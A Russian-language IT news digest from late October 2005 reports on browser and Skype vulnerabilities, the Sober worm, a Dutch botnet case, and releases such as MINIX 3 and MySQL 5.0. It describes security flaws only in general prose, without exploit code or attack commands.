27/10/2005 11:59 Internet Explorer: очередная уязвимость
Эксперты по информационной безопасности обнаружили уязвимость в браузере Microsoft Internet Explorer c установленным J2SE Runtime Environment, которая позволяет удаленному пользователю вызвать отказ в обслуживании браузера. Уязвимость обнаружена в библиотеке mshtmled.dll в Microsoft Internet Explorer с установленным J2SE. Удаленный пользователь может с помощью специально сформированной веб-страницы вызвать отказ в обслуживании браузера. «Дыре» присвоен ретинг опасности «средняя». Уязвим Microsoft Internet Explorer 6.0. Для использования уязвимости есть эксплойт. В настоящее время способов устранения уязвимости не существует.
Источник

27/10/2005 11:26 Google тестирует новый сервис Google Base
Крупнейший поисковый интернет-гигант Google начал тестирование онлайновой базы данных. Новый сервис Google Base будет серьезно конкурировать с одним из своих основных рекламодателей - компанией eBay, предоставляющей аналогичные услуги. В онлайновую базу данных Google, оснащенную поисковой системой, пользователи смогут бесплатно загружать абсолютно любого рода информацию. Тестовая версия сайта работала какое-то время, после чего была закрыта для публичного доступа, однако несколько скриншотов всё же были опубликованы на блоге Google. Специалисты уже называют этот проект грандиозным, учитывая и намерение Google создать свою собственную онлайновую платежную систему Google Wallet. Аналитики прогнозируют, что очень скоро отношения Google и eBay перерастут из партнерских в открытую конкуренцию. Не так давно eBay приобрела подразделение интернет-телефонии у Skype, а Google создала собственную систему передачи сообщений Google Talk. Теперь eBay начала разработку собственного поискового сервиса Magellan, для того, чтобы потенциальные покупатели могли осуществлять поиск товаров на сайте интернет-акуциона.
"Компьюлента"

27/10/2005 10:41 Microsoft поделилась планами в отношении защиты IE7
Следующая версия Internet Explorer будет надежнее, чем IE6, работать с зашифрованными страницами — ее миссия отчасти заключается в том, чтобы стать «безопасным по умолчанию» браузером. В версии 7 браузера Internet Explorer (IE) Microsoft сделала механизм управления HTTPS, который используется для защиты онлайновых транзакций, более строгим. В постинге в посвященном IE блоге менеджер программы Microsoft Internet Explorer Эрик Лоуренс пишет, что IE7 будет по умолчанию поддерживать протокол Transport Layer Security (TLS). Существующие версии IE для шифрования данных автоматически используют протокол SSL 2.0, который слабее, чем TLS, хотя и допускают переход на TLS вручную. Решение Microsoft исключить поддержку SSL 2.0 означает, что любой сайт, который все еще требует использования этого протокола, должен быть модернизирован, правда, Лоуренс утверждает, что таких сайтов осталась «всего горстка». Лоуренс объяснил также, как IE7, в отличие от предыдущих версий браузера, будет вести себя при возникновении проблем безопасности. «Когда IE6 сталкивается с проблемой, связанной с веб-страницей, доставляемой через HTTPS, он сообщает об этом пользователю через диалоговое окно и предлагается принять решение по безопасности. А IE7 следует парадигме XPSP2 „безопасности по умолчанию”, придерживаясь только безопасного поведения». IE7 не позволит пользователям видеть как безопасные, так и небезопасные элементы внутри страницы https. В IE6, когда браузер встречает страницу https, содержащую некоторый контент http, такая возможность предоставляется. В IE7 же по умолчанию будет обрабатываться только безопасный контент, а для доступа к остальному пользователю придется менять настройки. «Это важное изменение, так как очень мало пользователей (или веб-разработчиков) отчетливо понимает, какой риск для безопасности несет в себе работа с контентом, доставляемым по HTTP, внутри страницы HTTPS», — отмечает Лоуренс.
ZDNet

27/10/2005 10:23 Прототип ОС Linux будет с ней конкурировать
Одна из старейших операционных систем может стать конкурентом таких продуктов с открытым исходным кодом, как Linux и FreeBSD, сообщает блог Slashdot.org. Создатель MINIX Эндрю Таненбаум объявил о выходе ее новой версии спустя восемнадцать лет после того, как появился первый релиз. По словам Таненбаума, модернизированная MINIX может потребоваться там, где обычно используют "усеченные" варианты популярных "клонов" ОС UNIX. Ее предполагается встраивать в компактные цифровые устройства (такие как mp3-проигрыватели и сотовые телефоны) и контроллеры различных приборов. Не исключено, что Minix будет установлен на 100-долларовые портативные компьютеры для стран третьего мира, которые сейчас разрабатывают в Массачусетском технологическом институте. Вначале MINIX предназначалась для того, чтобы продемонстрировать студентам принципы работы более сложных многозадачных платформ. Именно она послужила прототипом для ОС Linux, одной из самых популярных операционных систем современности. Новая версия MINIX распространяется бесплатно вместе с исходным кодом. Согласно лицензии, его фрагменты можно видоизменять и использовать при разработке коммерческих продуктов. Известно, что последнее запрещается, например, лицензией GPL, под действие которой подпадает большинство "свободных" программ.
Подробности

26/10/2005 11:46 В Skype найдены критические уязвимости
В программе Skype, предназначенной для работы с одноименной службой IP-телефонии, обнаружены несколько критических уязвимостей. Как сообщается, дыры могут использоваться злоумышленниками с целью проведения DoS-атак на удаленные компьютеры и для выполнения на них произвольного вредоносного кода. Одна из выявленных уязвимостей связана с обработкой универсальных идентификаторов ресурса (Uniform Resource Identifier, URI). Злоумышленник при помощи сформированной специальным образом ссылки может спровоцировать ошибку переполнения буфера на ПК жертвы и получить несанкционированный доступ к системе. Схожая проблема возникает при импорте пользователем Skype виртуальных визитных карточек vCard нестандартного формата. Дыры присутствуют в клиентской программе Skype версий с 1.1.*.0 по 1.4.*.83 для операционных систем Microsoft Windows. Устранить опасность можно путем инсталляции модификации Skype с индексом 1.4.*.84 или выше. Кроме того, еще одна уязвимость в Skype позволяет осуществить DoS-атаку на удаленную машину. Для этого необходимо послать жертве специально сформированные пакеты данных, обработка которых спровоцирует перезапись части "кучи" (области памяти, выделяемой программе для динамически размещаемых структур данных) и аварийное завершение работы приложения. Брешь присутствует в версиях Skype для платформ Microsoft Windows (модификация 1.4.*.83 и более ранние варианты), Mac OS X (модификация 1.3.*.16 и более ранние варианты), Linux (модификация 1.2.*.17 и более ранние варианты) и Pocket PC (модификация 1.1.*.6 и более ранние варианты). Обновления для данной дыры уже выпущены и доступны для загрузки на сайте производителя.
Источник

26/10/2005 11:12 Функция защиты от нежелательного контента в PlayStation 3
В настоящее время власти нескольких городов и префектур Японии готовят пакет предложений, согласно которым существующая система присвоения рейтинга компьютерным игровым продуктам будет пересмотрена и приведена в соответствие с новейшими требованиями по ограничению доступа несовершеннолетних к играм определенной категории. Над проблемой защиты детей от нежелательного контента в компьютерных играх задумалась и компания Sony - в PlayStation 3 будет включена функция, которая позволит родителям контролировать использование детьми приставки. Таким решением Sony снимает ответственность за моральное здоровье детей с продавцов и разработчиков игр, а также сохраняет за ними права на "свободу творческого выражения". В частности, в нарушении этого права разработчиков уже обвиняется Арнольд Шварцнеггер. Представители Sony подчеркнули, что возможность контроля родителями игрового контента присутствует уже сейчас в PlayStation Portable. В то же время, представители Microsoft заявили, что Xbox 360 будет обладать аналогичной системой контроля контента. Она позволит устанавливать пароль на доступ к определённым играм и веб-сервису Xbox Live.
Источник

26/10/2005 10:30 Процессор Power экономит энергию
В новом двухъядерном процессоре PowerPC 970MP IBM применила несколько технологий, чтобы там, где это возможно, минимизировать потребляемую мощность. Процессор с тактовой частотой 2,5 ГГц уже применяется в компьютерах Power Mac G5 Quad от Apple Computer и с первого квартала 2006 года начнет устанавливаться в blade-серверы IBM. Уменьшение потребляемой энергии компьютеров, будь то настольные ПК или серверы, становится все более острой проблемой. Intel в качестве главной особенности своей архитектуры процессоров нового поколения указывает производительность в расчете на 1 Вт. Как рассказал в своем выступлении на конференции Fall Processor Forum в Сан-Хосе ведущий инженер IBM Норман Рорер, PowerPC 970MP уменьшает потребляемую энергию несколькими способами. Одна важная особенность конструкции заключается в том, что одно ядро при необходимости может отключаться, так что потребляемая мощность снижается почти наполовину. Кроме того, чип может наполовину или на четверть понизить свою тактовую частоту. При этом максимальная потребляемая мощность в 100 Вт уменьшается соответственно примерно до 60 Вт и 40 Вт. В дополнение к этому чип может работать в низковольтном режиме, что дает еще большую экономию. А в режиме «глубокого сна» тактовая частота может понижаться до одной 64-ой от номинальной. Когда оба ядра задействованы, но находятся в глубокой спячке, процессор потребляет всего 5 Вт, а с одним ядром — 3 Вт. Двухъядерный PowerPC 970MP означает для IBM частичный возврат к предыдущей эре. Его предшественники, PowerPC 970 и 970FX, имеют по одному ядру, но основаны на архитектуре процессора IBM Power4, который, дебютировав в 2001 году, стал первым двухъядерным серверным чипом. Каждое ядро PowerPC 970MP имеет собственную секцию высокоскоростной кэш-памяти емкостью 1 Мбайт. Отдельные кэши позволяют компьютеру при необходимости вместе к процессорным ядром отключать и кэш. К тому же 1-Мбайт кэш дает выигрыш в производительности по сравнению с 512-Кбайт кэшем, используемым в PowerPC 970FX.
Источник

26/10/2005 10:06 ВС США запрещена электронная почта
ВВС и ВМС США запретили своим военнослужащим пользование коммерческими почтовыми интернет-службами. Об этом сообщает во вторник американское издание Strategy Page. В сухопутных войсках эта мера пока не введена, отмечает издание. Этот шаг военное руководство обосновывает соображениями безопасности. Американские военные пользуются особой компьютерной сетью, которая лишь частично совместима с Интернетом. Там блокируются многие "внешние" сайты - администрация опасается проникновения извне "шпионского ПО" (spyware), которое размещается на многих интернет-ресурсах и пытается незаметно проникнуть в системы пользователей. Решение о запрете внешней веб-почты ВВС и ВМС базируется на соображении о том, что "шпионы" могут попасть в военные сети через почтовые аккаунты. В число запрещенных служб попадают популярные почтовые сервисы AOL, Google, MSN и Yahoo!. Военным предписывается пользоваться для переписки исключительно специальными ящиками в домене .mil - такой ящик есть у каждого американского военного, но их работу распространяется ряд ограничений. Кроме того, проходящие через эти ящики письма могут быть прочитаны агентами военной разведки (отмечается, что именно поэтому солдаты часто предпочитают использовать посторонние почтовые службы). Как подчеркивает издание, если аналогичный запрет будет введен и в сухопутных войсках, это может стать причиной массового возмущения военнослужащих. Кроме того, непонятно, как в этой ситуации быть с некоторыми зарубежными американскими базами и кораблями, на многих компьютерах которых нет "военного" Интернета, а есть только обычный. Странные они - эти американцы. В ВСРФ запрещено вообще (согласно специальному закону Министра Обороны) подключать воинские части к Интернет (прим. ньюсмейкера).
Подробности

25/10/2005 15:43 Обзор слабых мест безопасности VoIP
Рабочая группа Voice over IP Security Alliance (VOIPSA) предложила для обсуждения первый вариант документа "VoIP Security Threat Taxonomy", описывающего потенциальные слабые места текущих VoIP реализаций с точки зрения безопасности, сообщает opennet.ru. Среди угроз можно упомянуть VoIP спам, перехват VoIP звонков, DoS атаки.
Статья в PDF-формате

25/10/2005 13:30 Уязвимость в phpBB
Некто K-Gen сообщил о наличии уязвимости в популярном ПО для ведения форумов phpBB. Наличие уязвимости позволяет провести атаку типа внедрения скрипта. Связана с ошибкой проверки процедуры подключения аватара, связанного с конкретным пользователем. Вариант атаки связан с возможностью формирования специального GIF-файла, который на самом деле представляет собой HTML-файл или код скрипта, который будет выполнен браузером. Необходимо заметить, что код будет выполнен только в браузере Internet Explorer, что, как пишет автор, связано с уязвимостью в самом браузере. Уязвимости подвержены версии phpBB до 2.0.17 включительно. Для устранения уязвимости рекомендуется в настройках phpBB отключить опцию "avatar uploading".
Подробности

25/10/2005 13:15 Экс-глава СБУ назвал главных "хакеров"
Экс-глава СБУ Александр Турчинов заявляет, что следствию известны заказчики вмешательства в работу сервера Центральной избирательной комиссии во время подсчета голосов на выборах Президента Украины. Об этом он заявил во вчерашнем вечернем телеэфире канала "1+1". Отвечая на вопрос, известны ли заказчики в этом деле, Турчинов сказал: "Известны. Все известно. Я хочу сказать, что и господин Кивалов, и другие соответствующие сотрудники ЦИК, и те, кто заказывал эти преступления, они сегодня должны работать со следствием и давать серьезные ответы уже, наверное, не следствию, а на скамье подсудимых". Турчинов полагает, что это до сих пор не делается, скорее всего, из-за того, что в настоящее время речь идет об амнистии для тех, кто сфальсифицировал выборы. Также Турчинов добавил, что все материалы, касающиеся вмешательства в деятельность Центризбиркома, СБУ своевременно собрала и передала в Генеральную прокуратуру для предъявления обвинений.
Подробности

25/10/2005 12:51 Разборки IM-провайдеров
11–12 октября мир получил очередные новости о ситуации с взаимодействием IM (instant messaging) провайдеров — Yahoo! и MSN близки к тому, чтобы договориться о прозрачном обмене сообщениями между пользователями этих двух служб. Как сообщается, это даст возможность пользователям программ Yahoo! Messenger и MSN Messenger обмениваться между собой сообщениями без необходимости заведения соответствующих аккаунтов в каждой из этих систем. Также, как сообщают некоторые независимые обозреватели, пользователи двух служб смогут совершать голосовые (VoIP) звонки друг другу, хотя в официальном пресс-релизе Yahoo! и Microsoft ничего об этом не говорится. Возникает вопрос: а почему, собственно, два из трех крупнейших игроков рынка IM решили договориться? Конечно, потому что чувствуют влияние Google на этом рынке. Google сделал messenger, работающий на открытом протоколе и предложил желающим IM-провайдерам объединять сети. Однако, вместо того, чтобы стать участниками конфедерации, которую предлагает Google, Yahoo! и Microsoft решили устроить «междусобойчик».
Более подробно

25/10/2005 12:36 Открытая СУБД MySQL 5.0 стала стабильной
Компания MySQL AB, выпустив релиз 5.0.15 своей открытой СУБД, анонсировала переход пятой ветки базы данных в статус стабильной. В MySQL5 преимущественно были добавлены те возможности, которые позволят ей конкурировать с платными СУБД масштаба предприятия. Среди новинок присутствует поддержка триггеров, представлений и хранимых процедур. Кроме того, следует отметить включение в новую версию поддержки курсоров, упрощающих работу с большими БД, внедрение информационных схем, необходимых для доступа к метаданным, новые варианты распределенных транзакций, поддерживающих комплексную обработку данных в различных ОС и гетерогенных сетях. В пятую версию включен новый механизм создания архивных копий, новые инструменты миграции и преобразования данных. Помимо этого, разработчики из MySQL AB значительно обновили служебные библиотеки и драйверы. На сайте mysql.com желающие уже могут скачать пятую версию, которая доступна для Linux, Windows, Solaris, Mac OS X, FreeBSD, HP-UX, IBM AIX 5L, а также нескольких других ОС. Как говорят в самой MySQL, с выпуском новой версии они надеются конкурировать с такими гигантами рынка СУБД как Oracle, IBM и Microsoft.
Подробности

25/10/2005 12:13 Проблемы с совместимостью у PlayStation 2
Хотя аппаратные тесты тонкой PlayStation 2 модели SCPH-70000 подтвердили совместимость с "классическими" моделями PS2, в обновлениях линейки, начиная с японской SCPH-75000 (или Satin Silver PS2), появились разного рода проблемы при запуске ряда игр. Список "проблемных" игр опубликован на японском сайте Sony. В частности, PS2 зависает при вызове экрана сохранения в режиме Arcade History игры Tekken 5, а сохранения Hitman Contracts загружаются необычно долго. Другие трудности различного характера и степени сложности возникают в Gauntlet: Dark Legacy, F1 2001, F1 2002, Racing Battle C1 Grand Prix и The Stylish Mahjong. Некорректное воспроизведение звука при просмотре видеороликов замечено в Resident Evil 2, а проблемы с воспроизведение видео - в Chrono Cross. В список, состоящий из 39 позиций, входят также Drive 4, Krazy Ivan, Dave Mirra Freestyle BMX и Worms. В перечисленных играх возникают проблемы только на моделях линейки Slim-Line, начиная с SCPH-75000, которая доступна лишь в Японии. Причём неизвестно будет ли консоль выходить в других странах и станет ли она в дальнейшем стандартом для производства всех PS2.
Подробности

25/10/2005 11:51 В интернете появился новый троян Win32.Sober.ac
Как сообщает компания StarForce, в интернете появился новый червь Win32.Sober.ac. На популярных почтовых порталах наблюдается массовая рассылка сообщений, содержащих вложенные файлы pword_change.zip или KlassenFoto.zip. В теле письма обычно сообщается об изменении пароля пользователя и предлагается открыть файл с подробной информацией. При запуске файла активизируется троянская программа Win32.Sober.ac. Проникая на ПК, этот троян записывает свою копию в папку Windows/Connection Status под именем services.exe и netslot.nst, модифицирует записи в реестре, ворует всю базу почтовых адресов и рассылает себя по ним. Таким образом адреса конкретных пользователей и организаций становятся полностью публичными и уязвимыми для спама и новых интенет-угроз. Уязвимыми для Win32.Sober.ac являются платформы Win 95, Win 98, Win ME, Win NT, Win 2K и Win XP. Вредоносный червь имеет 3 разновидности: WORM_SOBER.ac, Win32.vb.iv, Trojan-Dropper.Win32.vb.iv.
Источник

25/10/2005 11:38 Вирусописатели сменили приоритеты
Вирусописатели стали меньше создавать вирусов для почтовых сервисов. Они взялись за создание вредоносных программ, распространяемых с помощью уязвимых веб-приложений. Также ожидается, что произойдет смещение акцента в поиске уязвимостей в традиционных системах — Windows/Unix и их приложений — в сторону сетевого оборудования и антивирусных продуктов. Согласно ежеквартальному обзору от "Лаборатории Касперского", сейчас наблюдается явное смещение внимания вирусописателей с почтовых и сетевых вирусов в сторону вредоносных программ, распространяемых при помощи уязвимых веб-приложений, основным из которых является Internet Explorer. Вследствие этого значительно увеличилось число взломов слабозащищенных сайтов с целью размещения на них эксплоитов для IE с последующей установкой троянских программ на компьютеры посетителей данных сайтов. Наиболее заметными и многочисленными примерами таких атак являлись постоянные взломы южнокорейских игровых порталов с размещением на них троянцев-шпионов, ворующих данные пользователей онлайн-игр Legend of Mir и Lineage. Не отставали от зарубежных хакеров и российские. Здесь троянцем, ради которого преимущественно и взламывались сайты, был небезызвестный LdPinch.
Источник

25/10/2005 11:10 Cisco предлагает внедрять IP-телефонию в оперативных службах
Компания Cisco Systems, ведущий производитель оборудования для построения компьютерных сетей, представила комплекс продуктов для организации локальной мобильной радиосвязи, предназначенный для оперативных и охранных служб, сообщает издание The Register. Комплекс базируется на IP-телефонии - технологии, использующейся сейчас для организации дешевой голосовой междугородней и международной связи - в отличие от обычных телефонных сетей, информация при такой связи передается в цифровом виде через Интернет. Cisco представила опытный образец, в течение года компания готова будет поставлять готовые решения. Предложенные системы для локальных радиопереговоров могут использоваться правоохранительными органами, другими оперативными службами, или просто организациями, в которых сотрудники рассредоточены по большой территории, например, сотрудниками аэропортов. Радиосети одного ведомства в разных местах можно соединять при помощи Интернета используя стандартные протоколы IP-телефонии. Кроме того, таким образом можно организовывать связь с ведомственными рациями при помощи обычных телефонов.
Источник

25/10/2005 10:35 Office 12: чья это таблица на моем сервере?
Понятие «бизнес-анализа» (business intelligence), или удобного доступа к важнейшим данным компании, — одно из ключевых для совершенствования следующей версии флагманского настольного ПО Microsoft. В понедельник компания расскажет о некоторых своих планах в этой области, в числе которых новая система на базе сервера для управления электронными таблицами Excel. В Office 12 Microsoft добавит возможность хранить электронные таблицы и манипулировать ими на центральном сервере, что позволит компаниям создавать бизнес-правила, определяющие, как те или иные сотрудники могут обращаться к данным. Microsoft пока не говорит, каким образом она намерена продавать новый сервис Excel Services, который «войдет в состав будущей версии технологии Microsoft SharePoint». Сейчас у Microsoft два разных продукта под названием SharePoint. Во-первых, это Windows SharePoint Services, бесплатно загружаемое дополнение к Windows Server 2003, которое обеспечивает базовые возможности обмена файлами и портала. Кроме того, Microsoft продает отдельный, более общий пакет серверного ПО SharePoint Portal Server 2003. Представитель компании отказался уточнить, как именно будет предлагаться Excel Services. В понедельник Microsoft планирует также продемонстрировать новые возможности настольного ПО Excel, в том числе инструменты для лучшей визуализации данных и возможность поддерживать постоянную связь с серверными приложениями, включая такое централизованное ПО, как системы от SAP, Oracle и Siebel Systems. Руководители Microsoft говорят, что все усовершенствования нацелены на расширение круга сотрудников, имеющих доступ к производственным показателям компании для понимания ее бизнеса.Компания готовит также для Office 12 абсолютно новый интерфейс. Бета-версия нового Office должна выйти в ноябре, а финальную версию планируется выпустить во втором полугодии будущего года. В более краткосрочной перспективе Microsoft объявила также о выходе 1 ноября работающей на сервере программы Microsoft Office Business Scorecard Manager, предназначенной для контроля за ключевой бизнес-информацией. Продукт будет стоить $5000 за серверное ПО, плюс $175 на каждого пользователя. В июле Microsoft выпустила вторую бета-версию этого ПО. У IBM тоже есть ПО корпоративной информационной панели в составе семейства Websphere.
Подробности

25/10/2005 10:04 Госдума занялась утечками баз данных
Российская Госдума, по информации агентства "Интерфакс", приняла накануне решение запросить МВД, ФСБ и Генпрокуратуру в связи с массовыми предложениями о продаже через Интернет баз данных банковских переводов, "Единого государственного реестра предприятий и организаций РФ", налоговых органов, Пенсионного фонда и других. Как сообщает агентство, парламентарии хотят выяснить, какие меры принимаются в соответствующих органах для сохранения баз данных, содержащих конфиденциальную информацию, а также о противодействии лицам, занимающимся распространением подобных сведений. Действия депутатов, по всей видимости, связаны с нашумевшими историями, связанными с утечкой таких баз данных на "черный рынок".
"Интерфакс"

24/10/2005 16:22 «Бот-пастухи» контролировали 1,5 млн ПК
Трое подозреваемых в многочисленных киберпреступлениях жителей Нидерландов могут получить строгий приговор ввиду появления новых свидетельств, указывающих на то, что они взломали около 1,5 млн ПК во всем мире — в 15 с лишним раз больше, чем предполагалось вначале. Обвиняемые, чьи имена не разглашаются, были арестованы две недели назад по подозрению в перехвате контроля над более чем 100 тыс. ПК. Они делали это при помощи троянского коня Toxbot, используя сеть зомбированных ПК для кражи номеров кредитных карт и других персональных данных, а также для шантажа онлайновых предприятий. Однако число захваченных ПК оказалось значительно больше — об этом сообщила в четверг прокуратура Нидерландов. Дополнительные данные, собранные службой Dutch Computer Emergency Response Team и интернет-сервис-провайдерами, указывают на то, что на самом деле было взломано свыше 1,5 млн ПК, 30 тыс. из которых находятся в Нидерландах. «Это определенно сыграет роль при вынесении приговора, — сказал в пятницу представитель прокуратуры Вим де-Брёйн. — Есть разница между разбитыми окнами в одном доме и по всей улице». По разным законам о компьютерных преступлениях обвиняемым грозит тюремное заключение сроком до шести лет.
Подробнее

24/10/2005 14:12 Мобильник узнает владельца по лицу
Компания Oki Electric Industry разработала технологию распознавания человека по лицу. Программа под названием Face Sensing Engine (FSE) предоставляет мобильным телефонам с интегрированной камерой возможность идентифицировать таким образом собственного владельца и защитить конфиденциальную информацию в памяти от несанкционированного доступа. FSE распознаёт изображение и предоставляет доступ к функциям телефона только зарегистрированным пользователям. Программа обрабатывает основные черты лица - глаза, нос, брови, рот и так далее. FSE учитывает при этом возможные вариации, которые могут возникнуть при другом освещении или если пользователь, например, моргнёт или улыбнется. По мнению Oki, такой способ аутентификации более быстрый и "естественный", чем ввод паролей. Компания рассчитывает в течение следующих двух лет выдать как минимум 500 лицензий, каждая на 10 тысяч устройств.
Источник

24/10/2005 13:29 Официальный релиз открытой ОС MINIX 3 — 3.1.1
MINIX 3 — новая операционная система с открытым кодом (Open Source), призванная быть очень надежной и безопасной, сообщает Nixp.Ru. ОС MINIX 3 основана на предыдущих версиях MINIX, однако принципиально отличается от них во многих отношениях. Одна из главных задач проекта MINIX 3 — оптимизация ОС для работы на компьютерах с ограниченными ресурсами и встраиваемых системах, а также для приложений, требующих очень высокого уровня надежности. MINIX 3 соответствует POSIX, содержит более 300 UNIX-программ, функционирует на платформах 386, 486, Pentium и т.п. (ведется разработка портов на ARM7 и PowerPC). Распространяется по лицензии типа BSD. Сегодня в comp.os.minix был анонсирован официальный релиз MINIX 3 — версию 3.1.1 можно скачать с сайта проекта.
Страница загрузки

24/10/2005 13:08 Агенты ФБР незаконно получали доступ к банковским счетам
Федеральное бюро расследований США вело секретную слежку за некоторыми гражданами Соединенных Штатов, не уведомляя об этом министерство юстиции и не отражая соответствующие действия в необходимых отчетах. Об этом говорится в документах, которые, как предполагается, будут обнародованы в понедельник, пишет газета Washington Post Согласно этим бумагам, в одном случае ФБР тайно следило за не называемым гражданином в течение пяти лет, в том числе 15 месяцев – без уведомления минюста. В других случаях агенты ФБР читали электронную почту уже после истечения срока ордера, получали доступ к банковским счетам и документам, не имея на это права, а также проводили "несанкционированные физические обыски". Эти свидетельства, как отмечает издание, подготовила организация Electronic Privacy Information Center, которая судится с американским министерством юстиции по поводу так называемого "Акта о Патриотизме" (USA Patriot Act) – закона, регламентирующего меры по борьбе с терроризмом. В настоящее время обе палаты Конгресса США выступают с инициативой наложить ограничения на реализацию этого Акта, принятого после терактов 11 сентября 2001 года и давшего дополнительные права сотрудникам контрразведки. Между тем представители ФБР отрицают какие-либо "серьезные нарушения" закона в работе Бюро и утверждают, что перечисленные случаи являются последствием "административных ошибок".
Источник

24/10/2005 12:35 В среднем 1500 web-сайтов "стираются с лица" каждый день без всяких видимых причин
В Голливудских фильмах хакеров часто изображают, как крутых борцов за свободу, сражающихся с репрессивным правительством и акулами бизнеса. Однако в реальной жизни все обстоит несколько по-другому. По словам доктора Питера Типпетта (Dr Peter Tippett), главного специалиста по безопасности компании Trusecure, каждый Интернет-адрес атакуется 40-50 раз в день. Но это еще не все, каждый адрес также атакуется 5-10 раз каждую минуту автоматизированными компьютерными атаками. В среднем 1500 web-сайтов, половина из которых из Бразилии, стираются с лица «киберпространства» каждый день без всяких видимых причин. Естественно, большинство атак безвредны или легко отражаемые, но масштабы проблемы тревожат специалистов. Так кто же все-таки эти люди - хакеры? Под всевозможные определения «хакера» в настоящий момент можно подвести более миллиона людей. Однако большинство из них - дети, играющие с новейшими инструментами «хакинга», доступными на огромном количестве специализированных сайтов. – так называемые «детские» скрипты. Популяция хакеров, представляющих действительную угрозу, насчитывает около 11 000 человек. Их возраст, в среднем, от 15 до 30 лет. Одна из десяти – женщина. Как правило, это скрытные, необщительные люди, но есть и исключения. Среди них встречается много, интеллигентных людей, которых Вы даже можете знать по работе, и не подозревать о их «увлечениях». На следующей ступени иерархии хакеров находится несколько сотен отлично подготовленных специалистов, которые совершают большинство атак и создают «инструменты» совершения компьютерных преступлений. Около 100 новых программных инструментов создаются хакерами каждый месяц и распространяются на более чем 11 000 специализированных и более 1 миллиона неспециализированных web-сайтах. Организованные преступные группы все-таки остаются более искусными пользователями таких инструментов, чем их создатели.
Источник

24/10/2005 12:02 Kerio прекращает выпуск персонального файрволла
31 декабря Kerio прекращает продажу своего популярного продукта Kerio Personal Firewall, хотя и продолжит поддержку старых версий в течение еще одного года. По словам вице-президента Kerio, компания решила сконцентрироваться на серверном продукте WinRoute Firewall, поскольку почувствовала, что не сможет соперничать с аналогичными решениями от конкурентов, включающими в себя антивирусные продукты.
Подробности

24/10/2005 11:42 Microsoft обновляет сайты, посвященные Xbox
Компания Microsoft объявила, что 24 октября сайты Xbox Live и Xbox.com будут закрыты в течение суток на обновление в рамках подготовки к релизу Xbox 360. Специалисты Microsoft планируют добавить функциональности сетевым ресурсам. Результаты изменений, однако, станут заметны пользователям лишь с 22 ноября, т.е. после выхода новой консоли. По предварительной информации, ожидается появление онлайнового магазина Xbox Live Marketplace, а также сервиса учета игровых достижений пользователей, сделанных в каждой из пройденных игр. "Достижения" будут доступны не только на обновленном Xbox.com, но и на Xbox Live в виде особой "индивидуальной карты игрока", на которой будет размещена информация о всех пройденных играх, количестве набранных очков и другая игровая статистика. Карты будут доступны всем игрокам, зарегистрированным на сервере, поэтому будет не трудно определить на чьи результаты стоит равняться. Доступ к рейтинговой системе карт будет осуществляться также и с других сетевых ресурсов Microsoft, включая MSN Spaces и официальные форумы, посвященные Xbox.
Подробности

24/10/2005 11:26 Атака на Cisco с использованием SNMP-протокола
На сайте SecurityLab опубликован перевод на русский язык статьи "Cisco SNMP configuration attack with a GRE tunnel", в которой авторы демонстрируют атаку на маршрутизатор Cisco через открытую на запись, для служебного IP, SNMP community. Цель атакующего - запустить GRE-туннель на свою машину (используя SNMP SET и обойдя ACL послав поддельный UDP пакет), через который организовать прослушивание трафика. Перевод выполнен Владимиром Куксенком.
Cтатья

24/10/2005 10:54 План выпуска NetBSD 3.0
Matthias Scheler сообщил об изменении плана выпуска NetBSD 3.0, сообщает opennet.ru. Ранее команда разработчиков планировала выпустить NetBSD 3.0 в октябре, но в связи с необходимостью решения ряда проблем, в том числе и проблем с безопасностью, релиз был отложен. На данный момент план выпуска такой: 12 ноября - NetBSD 3.0 RC1; 18 ноября - NetBSD 3.0 RC2; 26 ноября - NetBSD 3.0 RC3; окончательный релиз в конце ноября либо в начале декабря.
Подробности

24/10/2005 10:17 Российским программистам предлагают особый налоговый режим
Группа депутатов Госдумы разработала и отправила на согласование в правительство проект федерального закона "О внесении изменений в статью 18 части первой, часть вторую Налогового кодекса Российской Федерации и в отдельные законодательные акты Российской Федерации". Как пишет в понедельник газета "Время новостей", проект подразумевает введение налоговых льгот для крупных российских экспортеров программного обеспечения. Согласно предлагаемой авторами законопроекта схеме, если российская компания, производящая программное обеспечение, 70% (в денежном выражении) своей продукции поставляет на экспорт и имеет в штате не менее ста человек, она освобождается от всех налогов, исключая шестипроцентный налог на прибыль. Газета отмечает, что это этот проект дополняет проводимую Минэкономразвития РФ политику создания в стране особых экономических зон, весной правительством был принят соответствующий закон. С помощью создания подобного рода льгот Россия, по аналогии с некоторыми другими странами-активными участниками ИТ-рынка, сможет привлекать иностранные заказы на создание ПО и его компонентов и концентрировать высокотехнологичное производство.
Подробности

23/10/2005 13:50 Стив Балмер о секретах борьбы Microsoft с ОС Linux
Microsoft намерена предотвратить наступление Linux и «завоевать» сердца и кошельки покупателей новой стратегией, которая должна показать преимущество платформы Windows. О ней говорил исполнительный директор Стив Балмер (Steve Ballmer) в кулуарах симпозиума Gartner в Орландо (штат Флорида, США). Миллионы потенциальных клиентов Microsoft «смотрят» в сторону Linux или Unix как серверной операционной системы или софтверной основы различных аппаратных устройств. Microsoft, по словам Балмера, получает всего четверть контрактов на поставку ОС, в то время как остальные «уходят» к Sun (ОС Solaris), IBM (AIX Unix) и другим поставщикам Linux- и Unix-систем. Вместе с тем, у Microsoft есть «четыре больших возможности перехватить бизнес у Linux», считает Балмер. «И мы это сделаем», — заявляет он. Первая — высокопроизводительная кластеризация. «Это твердыня Linux. Это около 20% всех Linux-систем. Мы выходим с выпуском вычислительного кластера Windows Server. То же самое и с web-хостингом. Мы видим большую возможность предложить хостерам — облегченным хостерам — лучшее решение, чем Linux», — говорит Стив Балмер. Третья — серверные устройства со встроенной ОС. Как правило, их производители встраивают туда бесплатную разновидность Linux или Unix — в 99% случаев. Здесь стратегия Microsoft не определена. Возможно, придется раздавать встраиваемую Windows бесплатно и зарабатывать на поддержке. Четвертая — «ПО как услуга» (SaaS). Здесь пойдет борьба .NET против Java для серверов приложений. «Это означает, что мы должны приложить немало усилий», — заключил Балмер.
CNews

23/10/2005 13:10 История о том, как Microsoft выпускает "дырявые" патчи
